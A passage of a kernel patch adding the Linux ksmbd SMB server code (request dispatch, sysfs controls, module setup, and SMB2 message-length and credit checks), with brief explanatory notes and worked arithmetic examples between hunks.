++		ret = conn->ops->check_sign_req(work);
++		if (!ret) {
++			conn->ops->set_rsp_status(work, STATUS_ACCESS_DENIED);
++			return SERVER_HANDLER_CONTINUE;
++		}
++	}
++
++	ret = cmds->proc(work);
++
++	if (ret < 0)
++		ksmbd_debug(CONN, "Failed to process %u [%d]\n", command, ret);
++	/* AndX commands - chained request can return positive values */
++	else if (ret > 0) {
++		command = ret;
++		*cmd = command;
++		goto andx_again;
++	}
++
++	if (work->send_no_response)
++		return SERVER_HANDLER_ABORT;
++	return SERVER_HANDLER_CONTINUE;
++}
++
++static void __handle_ksmbd_work(struct ksmbd_work *work,
++				struct ksmbd_conn *conn)
++{
++	u16 command = 0;
++	int rc;
++
++	if (conn->ops->allocate_rsp_buf(work))
++		return;
++
++	if (conn->ops->is_transform_hdr &&
++	    conn->ops->is_transform_hdr(work->request_buf)) {
++		rc = conn->ops->decrypt_req(work);
++		if (rc < 0) {
++			conn->ops->set_rsp_status(work, STATUS_DATA_ERROR);
++			goto send;
++		}
++
++		work->encrypted = true;
++	}
++
++	rc = conn->ops->init_rsp_hdr(work);
++	if (rc) {
++		/* either uid or tid is not correct */
++		conn->ops->set_rsp_status(work, STATUS_INVALID_HANDLE);
++		goto send;
++	}
++
++	do {
++		if (conn->ops->check_user_session) {
++			rc = conn->ops->check_user_session(work);
++			if (rc < 0) {
++				if (rc == -EINVAL)
++					conn->ops->set_rsp_status(work,
++						STATUS_INVALID_PARAMETER);
++				else
++					conn->ops->set_rsp_status(work,
++						STATUS_USER_SESSION_DELETED);
++				goto send;
++			} else if (rc > 0) {
++				rc = conn->ops->get_ksmbd_tcon(work);
++				if (rc < 0) {
++					if (rc == -EINVAL)
++						conn->ops->set_rsp_status(work,
++							STATUS_INVALID_PARAMETER);
++					else
++						conn->ops->set_rsp_status(work,
++							STATUS_NETWORK_NAME_DELETED);
++					goto send;
++				}
++			}
++		}
++
++		rc = __process_request(work, conn, &command);
++		if (rc == SERVER_HANDLER_ABORT)
++			break;
++
++		/*
++		 * Call smb2_set_rsp_credits() to set the number of credits
++		 * granted in the hdr of the smb2 response.
++		 */
++		if (conn->ops->set_rsp_credits) {
++			spin_lock(&conn->credits_lock);
++			rc = conn->ops->set_rsp_credits(work);
++			spin_unlock(&conn->credits_lock);
++			if (rc < 0) {
++				conn->ops->set_rsp_status(work,
++					STATUS_INVALID_PARAMETER);
++				goto send;
++			}
++		}
++
++		if (work->sess &&
++		    (work->sess->sign || smb3_11_final_sess_setup_resp(work) ||
++		     conn->ops->is_sign_req(work, command)))
++			conn->ops->set_sign_rsp(work);
++	} while (is_chained_smb2_message(work));
++
++	if (work->send_no_response)
++		return;
++
++send:
++	smb3_preauth_hash_rsp(work);
++	if (work->sess && work->sess->enc && work->encrypted &&
++	    conn->ops->encrypt_resp) {
++		rc = conn->ops->encrypt_resp(work);
++		if (rc < 0)
++			conn->ops->set_rsp_status(work, STATUS_DATA_ERROR);
++	}
++
++	ksmbd_conn_write(work);
++}
++
++/**
++ * handle_ksmbd_work() - process pending smb work requests
++ * @wk:	smb work containing request command buffer
++ *
++ * Called by kworker threads to process remaining smb work requests.
++ */
++static void handle_ksmbd_work(struct work_struct *wk)
++{
++	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
++	struct ksmbd_conn *conn = work->conn;
++
++	atomic64_inc(&conn->stats.request_served);
++
++	__handle_ksmbd_work(work, conn);
++
++	ksmbd_conn_try_dequeue_request(work);
++	ksmbd_free_work_struct(work);
++	/*
++	 * Check the waitqueue to drop pending requests on
++	 * disconnection. waitqueue_active() is safe here because
++	 * the wait condition is checked with an atomic operation.
++	 */
++	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
++		wake_up(&conn->r_count_q);
++}
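
The atomic_dec_return()/wake_up() pair is the completion side of the
per-connection request counter; queue_ksmbd_work() below takes the matching
atomic_inc() before scheduling. A one-line sketch of the teardown
counterpart, assuming the connection code waits on the same r_count_q before
freeing the connection:

	/* teardown side: block until all in-flight work has drained */
	wait_event(conn->r_count_q, atomic_read(&conn->r_count) == 0);
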
++
++/**
++ * queue_ksmbd_work() - queue an smb request to the worker thread queue
++ *		for processing the smb command and sending a response
++ * @conn:	connection instance
++ *
++ * Read remaining data from the socket, then create and submit work.
++ */
++static int queue_ksmbd_work(struct ksmbd_conn *conn)
++{
++	struct ksmbd_work *work;
++
++	work = ksmbd_alloc_work_struct();
++	if (!work) {
++		pr_err("allocation for work failed\n");
++		return -ENOMEM;
++	}
++
++	work->conn = conn;
++	work->request_buf = conn->request_buf;
++	conn->request_buf = NULL;
++
++	ksmbd_init_smb_server(work);
++
++	ksmbd_conn_enqueue_request(work);
++	atomic_inc(&conn->r_count);
++	/* update activity on connection */
++	conn->last_active = jiffies;
++	INIT_WORK(&work->work, handle_ksmbd_work);
++	ksmbd_queue_work(work);
++	return 0;
++}
++
++static int ksmbd_server_process_request(struct ksmbd_conn *conn)
++{
++	return queue_ksmbd_work(conn);
++}
++
++static int ksmbd_server_terminate_conn(struct ksmbd_conn *conn)
++{
++	ksmbd_sessions_deregister(conn);
++	destroy_lease_table(conn);
++	return 0;
++}
++
++static void ksmbd_server_tcp_callbacks_init(void)
++{
++	struct ksmbd_conn_ops ops;
++
++	ops.process_fn = ksmbd_server_process_request;
++	ops.terminate_fn = ksmbd_server_terminate_conn;
++
++	ksmbd_conn_init_server_callbacks(&ops);
++}
++
++static void server_conf_free(void)
++{
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(server_conf.conf); i++) {
++		kfree(server_conf.conf[i]);
++		server_conf.conf[i] = NULL;
++	}
++}
++
++static int server_conf_init(void)
++{
++	WRITE_ONCE(server_conf.state, SERVER_STATE_STARTING_UP);
++	server_conf.enforced_signing = 0;
++	server_conf.min_protocol = ksmbd_min_protocol();
++	server_conf.max_protocol = ksmbd_max_protocol();
++	server_conf.auth_mechs = KSMBD_AUTH_NTLMSSP;
++#ifdef CONFIG_SMB_SERVER_KERBEROS5
++	server_conf.auth_mechs |= KSMBD_AUTH_KRB5 |
++				KSMBD_AUTH_MSKRB5;
++#endif
++	return 0;
++}
++
++static void server_ctrl_handle_init(struct server_ctrl_struct *ctrl)
++{
++	int ret;
++
++	ret = ksmbd_conn_transport_init();
++	if (ret) {
++		server_queue_ctrl_reset_work();
++		return;
++	}
++
++	WRITE_ONCE(server_conf.state, SERVER_STATE_RUNNING);
++}
++
++static void server_ctrl_handle_reset(struct server_ctrl_struct *ctrl)
++{
++	ksmbd_ipc_soft_reset();
++	ksmbd_conn_transport_destroy();
++	server_conf_free();
++	server_conf_init();
++	WRITE_ONCE(server_conf.state, SERVER_STATE_STARTING_UP);
++}
++
++static void server_ctrl_handle_work(struct work_struct *work)
++{
++	struct server_ctrl_struct *ctrl;
++
++	ctrl = container_of(work, struct server_ctrl_struct, ctrl_work);
++
++	mutex_lock(&ctrl_lock);
++	switch (ctrl->type) {
++	case SERVER_CTRL_TYPE_INIT:
++		server_ctrl_handle_init(ctrl);
++		break;
++	case SERVER_CTRL_TYPE_RESET:
++		server_ctrl_handle_reset(ctrl);
++		break;
++	default:
++		pr_err("Unknown server work type: %d\n", ctrl->type);
++	}
++	mutex_unlock(&ctrl_lock);
++	kfree(ctrl);
++	module_put(THIS_MODULE);
++}
++
++static int __queue_ctrl_work(int type)
++{
++	struct server_ctrl_struct *ctrl;
++
++	ctrl = kmalloc(sizeof(struct server_ctrl_struct), GFP_KERNEL);
++	if (!ctrl)
++		return -ENOMEM;
++
++	__module_get(THIS_MODULE);
++	ctrl->type = type;
++	INIT_WORK(&ctrl->ctrl_work, server_ctrl_handle_work);
++	queue_work(system_long_wq, &ctrl->ctrl_work);
++	return 0;
++}
++
++int server_queue_ctrl_init_work(void)
++{
++	return __queue_ctrl_work(SERVER_CTRL_TYPE_INIT);
++}
++
++int server_queue_ctrl_reset_work(void)
++{
++	return __queue_ctrl_work(SERVER_CTRL_TYPE_RESET);
++}
++
++static ssize_t stats_show(struct class *class, struct class_attribute *attr,
++			  char *buf)
++{
++	/*
++	 * Increment this each time you change the stats output format,
++	 * so user space will know what to do.
++	 */
++	static int stats_version = 2;
++	static const char * const state[] = {
++		"startup",
++		"running",
++		"reset",
++		"shutdown"
++	};
++
++	ssize_t sz = scnprintf(buf, PAGE_SIZE, "%d %s %d %lu\n", stats_version,
++			       state[server_conf.state], server_conf.tcp_port,
++			       server_conf.ipc_last_active / HZ);
++	return sz;
++}
++
++static ssize_t kill_server_store(struct class *class,
++				 struct class_attribute *attr, const char *buf,
++				 size_t len)
++{
++	if (!sysfs_streq(buf, "hard"))
++		return len;
++
++	pr_info("kill command received\n");
++	mutex_lock(&ctrl_lock);
++	WRITE_ONCE(server_conf.state, SERVER_STATE_RESETTING);
++	__module_get(THIS_MODULE);
++	server_ctrl_handle_reset(NULL);
++	module_put(THIS_MODULE);
++	mutex_unlock(&ctrl_lock);
++	return len;
++}
++
++static const char * const debug_type_strings[] = {"smb", "auth", "vfs",
++						  "oplock", "ipc", "conn",
++						  "rdma"};
++
++static ssize_t debug_show(struct class *class, struct class_attribute *attr,
++			  char *buf)
++{
++	ssize_t sz = 0;
++	int i, pos = 0;
++
++	for (i = 0; i < ARRAY_SIZE(debug_type_strings); i++) {
++		if ((ksmbd_debug_types >> i) & 1) {
++			pos = scnprintf(buf + sz,
++					PAGE_SIZE - sz,
++					"[%s] ",
++					debug_type_strings[i]);
++		} else {
++			pos = scnprintf(buf + sz,
++					PAGE_SIZE - sz,
++					"%s ",
++					debug_type_strings[i]);
++		}
++		sz += pos;
++	}
++	sz += scnprintf(buf + sz, PAGE_SIZE - sz, "\n");
++	return sz;
++}
++
++static ssize_t debug_store(struct class *class, struct class_attribute *attr,
++			   const char *buf, size_t len)
++{
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(debug_type_strings); i++) {
++		if (sysfs_streq(buf, "all")) {
++			if (ksmbd_debug_types == KSMBD_DEBUG_ALL)
++				ksmbd_debug_types = 0;
++			else
++				ksmbd_debug_types = KSMBD_DEBUG_ALL;
++			break;
++		}
++
++		if (sysfs_streq(buf, debug_type_strings[i])) {
++			if (ksmbd_debug_types & (1 << i))
++				ksmbd_debug_types &= ~(1 << i);
++			else
++				ksmbd_debug_types |= (1 << i);
++			break;
++		}
++	}
++
++	return len;
++}
++
++static CLASS_ATTR_RO(stats);
++static CLASS_ATTR_WO(kill_server);
++static CLASS_ATTR_RW(debug);
++
++static struct attribute *ksmbd_control_class_attrs[] = {
++	&class_attr_stats.attr,
++	&class_attr_kill_server.attr,
++	&class_attr_debug.attr,
++	NULL,
++};
++ATTRIBUTE_GROUPS(ksmbd_control_class);
++
++static struct class ksmbd_control_class = {
++	.name		= "ksmbd-control",
++	.owner		= THIS_MODULE,
++	.class_groups	= ksmbd_control_class_groups,
++};
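
Registering this class gives the server a small sysfs control surface,
roughly (paths assume the default sysfs mount):

	/sys/class/ksmbd-control/stats		read-only: "version state port ipc_age"
	/sys/class/ksmbd-control/kill_server	write-only: accepts "hard"
	/sys/class/ksmbd-control/debug		read/write: "all" or a type name
						such as "smb" toggles that debug bit
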
++
++static int ksmbd_server_shutdown(void)
++{
++	WRITE_ONCE(server_conf.state, SERVER_STATE_SHUTTING_DOWN);
++
++	class_unregister(&ksmbd_control_class);
++	ksmbd_workqueue_destroy();
++	ksmbd_ipc_release();
++	ksmbd_conn_transport_destroy();
++	ksmbd_crypto_destroy();
++	ksmbd_free_global_file_table();
++	destroy_lease_table(NULL);
++	ksmbd_work_pool_destroy();
++	ksmbd_exit_file_cache();
++	server_conf_free();
++	return 0;
++}
++
++static int __init ksmbd_server_init(void)
++{
++	int ret;
++
++	ret = class_register(&ksmbd_control_class);
++	if (ret) {
++		pr_err("Unable to register ksmbd-control class\n");
++		return ret;
++	}
++
++	ksmbd_server_tcp_callbacks_init();
++
++	ret = server_conf_init();
++	if (ret)
++		goto err_unregister;
++
++	ret = ksmbd_work_pool_init();
++	if (ret)
++		goto err_unregister;
++
++	ret = ksmbd_init_file_cache();
++	if (ret)
++		goto err_destroy_work_pools;
++
++	ret = ksmbd_ipc_init();
++	if (ret)
++		goto err_exit_file_cache;
++
++	ret = ksmbd_init_global_file_table();
++	if (ret)
++		goto err_ipc_release;
++
++	ret = ksmbd_inode_hash_init();
++	if (ret)
++		goto err_destroy_file_table;
++
++	ret = ksmbd_crypto_create();
++	if (ret)
++		goto err_release_inode_hash;
++
++	ret = ksmbd_workqueue_init();
++	if (ret)
++		goto err_crypto_destroy;
++
++	pr_warn_once("The ksmbd server is experimental\n");
++
++	return 0;
++
++err_crypto_destroy:
++	ksmbd_crypto_destroy();
++err_release_inode_hash:
++	ksmbd_release_inode_hash();
++err_destroy_file_table:
++	ksmbd_free_global_file_table();
++err_ipc_release:
++	ksmbd_ipc_release();
++err_exit_file_cache:
++	ksmbd_exit_file_cache();
++err_destroy_work_pools:
++	ksmbd_work_pool_destroy();
++err_unregister:
++	class_unregister(&ksmbd_control_class);
++
++	return ret;
++}
++
++/**
++ * ksmbd_server_exit() - shutdown forker thread and free memory at module exit
++ */
++static void __exit ksmbd_server_exit(void)
++{
++	ksmbd_server_shutdown();
++	rcu_barrier();
++	ksmbd_release_inode_hash();
++}
++
++MODULE_AUTHOR("Namjae Jeon <linkinjeon@kernel.org>");
++MODULE_VERSION(KSMBD_VERSION);
++MODULE_DESCRIPTION("Linux kernel CIFS/SMB SERVER");
++MODULE_LICENSE("GPL");
++MODULE_SOFTDEP("pre: ecb");
++MODULE_SOFTDEP("pre: hmac");
++MODULE_SOFTDEP("pre: md5");
++MODULE_SOFTDEP("pre: nls");
++MODULE_SOFTDEP("pre: aes");
++MODULE_SOFTDEP("pre: cmac");
++MODULE_SOFTDEP("pre: sha256");
++MODULE_SOFTDEP("pre: sha512");
++MODULE_SOFTDEP("pre: aead2");
++MODULE_SOFTDEP("pre: ccm");
++MODULE_SOFTDEP("pre: gcm");
++MODULE_SOFTDEP("pre: crc32");
++module_init(ksmbd_server_init)
++module_exit(ksmbd_server_exit)
+diff --git a/fs/smb/server/server.h b/fs/smb/server/server.h
+new file mode 100644
+index 0000000000000..db72781817603
+--- /dev/null
++++ b/fs/smb/server/server.h
+@@ -0,0 +1,71 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __SERVER_H__
++#define __SERVER_H__
++
++#include "smbacl.h"
++
++/*
++ * Server state type
++ */
++enum {
++	SERVER_STATE_STARTING_UP,
++	SERVER_STATE_RUNNING,
++	SERVER_STATE_RESETTING,
++	SERVER_STATE_SHUTTING_DOWN,
++};
++
++/*
++ * Server global config string index
++ */
++enum {
++	SERVER_CONF_NETBIOS_NAME,
++	SERVER_CONF_SERVER_STRING,
++	SERVER_CONF_WORK_GROUP,
++};
++
++struct ksmbd_server_config {
++	unsigned int		flags;
++	unsigned int		state;
++	short			signing;
++	short			enforced_signing;
++	short			min_protocol;
++	short			max_protocol;
++	unsigned short		tcp_port;
++	unsigned short		ipc_timeout;
++	unsigned long		ipc_last_active;
++	unsigned long		deadtime;
++	unsigned int		share_fake_fscaps;
++	struct smb_sid		domain_sid;
++	unsigned int		auth_mechs;
++	unsigned int		max_connections;
++
++	char			*conf[SERVER_CONF_WORK_GROUP + 1];
++};
++
++extern struct ksmbd_server_config server_conf;
++
++int ksmbd_set_netbios_name(char *v);
++int ksmbd_set_server_string(char *v);
++int ksmbd_set_work_group(char *v);
++
++char *ksmbd_netbios_name(void);
++char *ksmbd_server_string(void);
++char *ksmbd_work_group(void);
++
++static inline int ksmbd_server_running(void)
++{
++	return READ_ONCE(server_conf.state) == SERVER_STATE_RUNNING;
++}
++
++static inline int ksmbd_server_configurable(void)
++{
++	return READ_ONCE(server_conf.state) < SERVER_STATE_RESETTING;
++}
++
++int server_queue_ctrl_init_work(void);
++int server_queue_ctrl_reset_work(void);
++#endif /* __SERVER_H__ */
+diff --git a/fs/smb/server/smb2misc.c b/fs/smb/server/smb2misc.c
+new file mode 100644
+index 0000000000000..33b7e6c4ceffb
+--- /dev/null
++++ b/fs/smb/server/smb2misc.c
+@@ -0,0 +1,454 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include "glob.h"
++#include "nterr.h"
++#include "smb_common.h"
++#include "smbstatus.h"
++#include "mgmt/user_session.h"
++#include "connection.h"
++
++static int check_smb2_hdr(struct smb2_hdr *hdr)
++{
++	/*
++	 * Make sure that this really is an SMB request and not a response.
++	 */
++	if (hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
++		return 1;
++	return 0;
++}
++
++/*
++ *  The following table defines the expected "StructureSize" of SMB2 requests
++ *  in order by SMB2 command.  This is similar to "wct" in SMB/CIFS requests.
++ *
++ *  Note that commands are defined in smb2pdu.h in le16 but the array below is
++ *  indexed by command in host byte order
++ */
++static const __le16 smb2_req_struct_sizes[NUMBER_OF_SMB2_COMMANDS] = {
++	/* SMB2_NEGOTIATE */ cpu_to_le16(36),
++	/* SMB2_SESSION_SETUP */ cpu_to_le16(25),
++	/* SMB2_LOGOFF */ cpu_to_le16(4),
++	/* SMB2_TREE_CONNECT */ cpu_to_le16(9),
++	/* SMB2_TREE_DISCONNECT */ cpu_to_le16(4),
++	/* SMB2_CREATE */ cpu_to_le16(57),
++	/* SMB2_CLOSE */ cpu_to_le16(24),
++	/* SMB2_FLUSH */ cpu_to_le16(24),
++	/* SMB2_READ */ cpu_to_le16(49),
++	/* SMB2_WRITE */ cpu_to_le16(49),
++	/* SMB2_LOCK */ cpu_to_le16(48),
++	/* SMB2_IOCTL */ cpu_to_le16(57),
++	/* SMB2_CANCEL */ cpu_to_le16(4),
++	/* SMB2_ECHO */ cpu_to_le16(4),
++	/* SMB2_QUERY_DIRECTORY */ cpu_to_le16(33),
++	/* SMB2_CHANGE_NOTIFY */ cpu_to_le16(32),
++	/* SMB2_QUERY_INFO */ cpu_to_le16(41),
++	/* SMB2_SET_INFO */ cpu_to_le16(33),
++	/* use 44 for lease break */
++	/* SMB2_OPLOCK_BREAK */ cpu_to_le16(36)
++};
++
++/*
++ * The size of the variable area depends on the offset and length fields
++ * located in different fields for various SMB2 requests. SMB2 requests
++ * with no variable length info show an offset of zero for the offset field.
++ */
++static const bool has_smb2_data_area[NUMBER_OF_SMB2_COMMANDS] = {
++	/* SMB2_NEGOTIATE */ true,
++	/* SMB2_SESSION_SETUP */ true,
++	/* SMB2_LOGOFF */ false,
++	/* SMB2_TREE_CONNECT */	true,
++	/* SMB2_TREE_DISCONNECT */ false,
++	/* SMB2_CREATE */ true,
++	/* SMB2_CLOSE */ false,
++	/* SMB2_FLUSH */ false,
++	/* SMB2_READ */	true,
++	/* SMB2_WRITE */ true,
++	/* SMB2_LOCK */	true,
++	/* SMB2_IOCTL */ true,
++	/* SMB2_CANCEL */ false, /* BB CHECK this not listed in documentation */
++	/* SMB2_ECHO */ false,
++	/* SMB2_QUERY_DIRECTORY */ true,
++	/* SMB2_CHANGE_NOTIFY */ false,
++	/* SMB2_QUERY_INFO */ true,
++	/* SMB2_SET_INFO */ true,
++	/* SMB2_OPLOCK_BREAK */ false
++};
++
++/*
++ * Set the length of the data area and the offset to the arguments;
++ * if they are invalid, return an error.
++ */
++static int smb2_get_data_area_len(unsigned int *off, unsigned int *len,
++				  struct smb2_hdr *hdr)
++{
++	int ret = 0;
++
++	*off = 0;
++	*len = 0;
++
++	/*
++	 * Following commands have data areas so we have to get the location
++	 * of the data buffer offset and data buffer length for the particular
++	 * command.
++	 */
++	switch (hdr->Command) {
++	case SMB2_SESSION_SETUP:
++		*off = le16_to_cpu(((struct smb2_sess_setup_req *)hdr)->SecurityBufferOffset);
++		*len = le16_to_cpu(((struct smb2_sess_setup_req *)hdr)->SecurityBufferLength);
++		break;
++	case SMB2_TREE_CONNECT:
++		*off = le16_to_cpu(((struct smb2_tree_connect_req *)hdr)->PathOffset);
++		*len = le16_to_cpu(((struct smb2_tree_connect_req *)hdr)->PathLength);
++		break;
++	case SMB2_CREATE:
++	{
++		if (((struct smb2_create_req *)hdr)->CreateContextsLength) {
++			*off = le32_to_cpu(((struct smb2_create_req *)
++				hdr)->CreateContextsOffset);
++			*len = le32_to_cpu(((struct smb2_create_req *)
++				hdr)->CreateContextsLength);
++			break;
++		}
++
++		*off = le16_to_cpu(((struct smb2_create_req *)hdr)->NameOffset);
++		*len = le16_to_cpu(((struct smb2_create_req *)hdr)->NameLength);
++		break;
++	}
++	case SMB2_QUERY_INFO:
++		*off = le16_to_cpu(((struct smb2_query_info_req *)hdr)->InputBufferOffset);
++		*len = le32_to_cpu(((struct smb2_query_info_req *)hdr)->InputBufferLength);
++		break;
++	case SMB2_SET_INFO:
++		*off = le16_to_cpu(((struct smb2_set_info_req *)hdr)->BufferOffset);
++		*len = le32_to_cpu(((struct smb2_set_info_req *)hdr)->BufferLength);
++		break;
++	case SMB2_READ:
++		*off = le16_to_cpu(((struct smb2_read_req *)hdr)->ReadChannelInfoOffset);
++		*len = le16_to_cpu(((struct smb2_read_req *)hdr)->ReadChannelInfoLength);
++		break;
++	case SMB2_WRITE:
++		if (((struct smb2_write_req *)hdr)->DataOffset ||
++		    ((struct smb2_write_req *)hdr)->Length) {
++			*off = max_t(unsigned int,
++				     le16_to_cpu(((struct smb2_write_req *)hdr)->DataOffset),
++				     offsetof(struct smb2_write_req, Buffer));
++			*len = le32_to_cpu(((struct smb2_write_req *)hdr)->Length);
++			break;
++		}
++
++		*off = le16_to_cpu(((struct smb2_write_req *)hdr)->WriteChannelInfoOffset);
++		*len = le16_to_cpu(((struct smb2_write_req *)hdr)->WriteChannelInfoLength);
++		break;
++	case SMB2_QUERY_DIRECTORY:
++		*off = le16_to_cpu(((struct smb2_query_directory_req *)hdr)->FileNameOffset);
++		*len = le16_to_cpu(((struct smb2_query_directory_req *)hdr)->FileNameLength);
++		break;
++	case SMB2_LOCK:
++	{
++		unsigned short lock_count;
++
++		lock_count = le16_to_cpu(((struct smb2_lock_req *)hdr)->LockCount);
++		if (lock_count > 0) {
++			*off = offsetof(struct smb2_lock_req, locks);
++			*len = sizeof(struct smb2_lock_element) * lock_count;
++		}
++		break;
++	}
++	case SMB2_IOCTL:
++		*off = le32_to_cpu(((struct smb2_ioctl_req *)hdr)->InputOffset);
++		*len = le32_to_cpu(((struct smb2_ioctl_req *)hdr)->InputCount);
++		break;
++	default:
++		ksmbd_debug(SMB, "no length check for command\n");
++		break;
++	}
++
++	if (*off > 4096) {
++		ksmbd_debug(SMB, "offset %d too large\n", *off);
++		ret = -EINVAL;
++	} else if ((u64)*off + *len > MAX_STREAM_PROT_LEN) {
++		ksmbd_debug(SMB, "Request is larger than maximum stream protocol length(%u): %llu\n",
++			    MAX_STREAM_PROT_LEN, (u64)*off + *len);
++		ret = -EINVAL;
++	}
++
++	return ret;
++}
++
++/*
++ * Calculate the size of the SMB message based on the fixed header
++ * portion, the number of word parameters and the data portion of the message.
++ */
++static int smb2_calc_size(void *buf, unsigned int *len)
++{
++	struct smb2_pdu *pdu = (struct smb2_pdu *)buf;
++	struct smb2_hdr *hdr = &pdu->hdr;
++	unsigned int offset; /* the offset from the beginning of SMB to data area */
++	unsigned int data_length; /* the length of the variable length data area */
++	int ret;
++
++	/* Structure Size has already been checked to make sure it is 64 */
++	*len = le16_to_cpu(hdr->StructureSize);
++
++	/*
++	 * StructureSize2, i.e. the length of the fixed parameter area, has
++	 * already been checked to make sure it is the correct length.
++	 */
++	*len += le16_to_cpu(pdu->StructureSize2);
++	/*
++	 * StructureSize2 of smb2_lock pdu is set to 48, indicating
++	 * the size of smb2 lock request with single smb2_lock_element
++	 * regardless of number of locks. Subtract single
++	 * smb2_lock_element for correct buffer size check.
++	 */
++	if (hdr->Command == SMB2_LOCK)
++		*len -= sizeof(struct smb2_lock_element);
++
++	if (has_smb2_data_area[le16_to_cpu(hdr->Command)] == false)
++		goto calc_size_exit;
++
++	ret = smb2_get_data_area_len(&offset, &data_length, hdr);
++	if (ret)
++		return ret;
++	ksmbd_debug(SMB, "SMB2 data length %u offset %u\n", data_length,
++		    offset);
++
++	if (data_length > 0) {
++		/*
++		 * Check to make sure that the data area begins after the fixed
++		 * area. Note that the last byte of the fixed area is part of
++		 * the data area for some commands, typically those with an odd
++		 * StructureSize,
++		 * so we must add one to the calculation.
++		 */
++		if (offset + 1 < *len) {
++			ksmbd_debug(SMB,
++				    "data area offset %d overlaps SMB2 header %u\n",
++				    offset + 1, *len);
++			return -EINVAL;
++		}
++
++		*len = offset + data_length;
++	}
++
++calc_size_exit:
++	ksmbd_debug(SMB, "SMB2 len %u\n", *len);
++	return 0;
++}
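
A worked example of the calculation above, for an SMB2 WRITE whose DataOffset
is 112 and Length is 4096:

	*len  = 64;		/* smb2_hdr StructureSize */
	*len += 49;		/* smb2_write_req StructureSize2 */
	/* data area present: offset = 112, data_length = 4096 */
	/* overlap check: offset + 1 (113) is not < *len (113), so it passes */
	*len  = 112 + 4096;	/* final calculated length: 4208 */
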
++
++static inline int smb2_query_info_req_len(struct smb2_query_info_req *h)
++{
++	return le32_to_cpu(h->InputBufferLength) +
++		le32_to_cpu(h->OutputBufferLength);
++}
++
++static inline int smb2_set_info_req_len(struct smb2_set_info_req *h)
++{
++	return le32_to_cpu(h->BufferLength);
++}
++
++static inline int smb2_read_req_len(struct smb2_read_req *h)
++{
++	return le32_to_cpu(h->Length);
++}
++
++static inline int smb2_write_req_len(struct smb2_write_req *h)
++{
++	return le32_to_cpu(h->Length);
++}
++
++static inline int smb2_query_dir_req_len(struct smb2_query_directory_req *h)
++{
++	return le32_to_cpu(h->OutputBufferLength);
++}
++
++static inline int smb2_ioctl_req_len(struct smb2_ioctl_req *h)
++{
++	return le32_to_cpu(h->InputCount) +
++		le32_to_cpu(h->OutputCount);
++}
++
++static inline int smb2_ioctl_resp_len(struct smb2_ioctl_req *h)
++{
++	return le32_to_cpu(h->MaxInputResponse) +
++		le32_to_cpu(h->MaxOutputResponse);
++}
++
++static int smb2_validate_credit_charge(struct ksmbd_conn *conn,
++				       struct smb2_hdr *hdr)
++{
++	unsigned int req_len = 0, expect_resp_len = 0, calc_credit_num, max_len;
++	unsigned short credit_charge = le16_to_cpu(hdr->CreditCharge);
++	void *__hdr = hdr;
++	int ret = 0;
++
++	switch (hdr->Command) {
++	case SMB2_QUERY_INFO:
++		req_len = smb2_query_info_req_len(__hdr);
++		break;
++	case SMB2_SET_INFO:
++		req_len = smb2_set_info_req_len(__hdr);
++		break;
++	case SMB2_READ:
++		req_len = smb2_read_req_len(__hdr);
++		break;
++	case SMB2_WRITE:
++		req_len = smb2_write_req_len(__hdr);
++		break;
++	case SMB2_QUERY_DIRECTORY:
++		req_len = smb2_query_dir_req_len(__hdr);
++		break;
++	case SMB2_IOCTL:
++		req_len = smb2_ioctl_req_len(__hdr);
++		expect_resp_len = smb2_ioctl_resp_len(__hdr);
++		break;
++	case SMB2_CANCEL:
++		return 0;
++	default:
++		req_len = 1;
++		break;
++	}
++
++	credit_charge = max_t(unsigned short, credit_charge, 1);
++	max_len = max_t(unsigned int, req_len, expect_resp_len);
++	calc_credit_num = DIV_ROUND_UP(max_len, SMB2_MAX_BUFFER_SIZE);
++
++	if (credit_charge < calc_credit_num) {
++		ksmbd_debug(SMB, "Insufficient credit charge, given: %d, needed: %d\n",
++			    credit_charge, calc_credit_num);
++		return 1;
++	} else if (credit_charge > conn->vals->max_credits) {
++		ksmbd_debug(SMB, "Too large credit charge: %d\n", credit_charge);
++		return 1;
++	}
++
++	spin_lock(&conn->credits_lock);
++	if (credit_charge > conn->total_credits) {
++		ksmbd_debug(SMB, "Insufficient credits granted, given: %u, granted: %u\n",
++			    credit_charge, conn->total_credits);
++		ret = 1;
++	}
++
++	if ((u64)conn->outstanding_credits + credit_charge > conn->total_credits) {
++		ksmbd_debug(SMB, "Limits exceeding the maximum allowable outstanding requests, given : %u, pending : %u\n",
++			    credit_charge, conn->outstanding_credits);
++		ret = 1;
++	} else
++		conn->outstanding_credits += credit_charge;
++
++	spin_unlock(&conn->credits_lock);
++
++	return ret;
++}
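
Credit charges are counted in units of SMB2_MAX_BUFFER_SIZE (64 KiB in this
codebase), so for, say, a 1 MiB READ the arithmetic above works out as:

	req_len         = 1024 * 1024;	/* 1 MiB read */
	calc_credit_num = DIV_ROUND_UP(req_len, SMB2_MAX_BUFFER_SIZE);
	/* = 16, so a CreditCharge below 16 is rejected as insufficient */
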
++
++int ksmbd_smb2_check_message(struct ksmbd_work *work)
++{
++	struct smb2_pdu *pdu = ksmbd_req_buf_next(work);
++	struct smb2_hdr *hdr = &pdu->hdr;
++	int command;
++	__u32 clc_len;  /* calculated length */
++	__u32 len = get_rfc1002_len(work->request_buf);
++	__u32 req_struct_size, next_cmd = le32_to_cpu(hdr->NextCommand);
++
++	if ((u64)work->next_smb2_rcv_hdr_off + next_cmd > len) {
++		pr_err("next command(%u) offset exceeds smb msg size\n",
++				next_cmd);
++		return 1;
++	}
++
++	if (next_cmd > 0)
++		len = next_cmd;
++	else if (work->next_smb2_rcv_hdr_off)
++		len -= work->next_smb2_rcv_hdr_off;
++
++	if (check_smb2_hdr(hdr))
++		return 1;
++
++	if (hdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
++		ksmbd_debug(SMB, "Illegal structure size %u\n",
++			    le16_to_cpu(hdr->StructureSize));
++		return 1;
++	}
++
++	command = le16_to_cpu(hdr->Command);
++	if (command >= NUMBER_OF_SMB2_COMMANDS) {
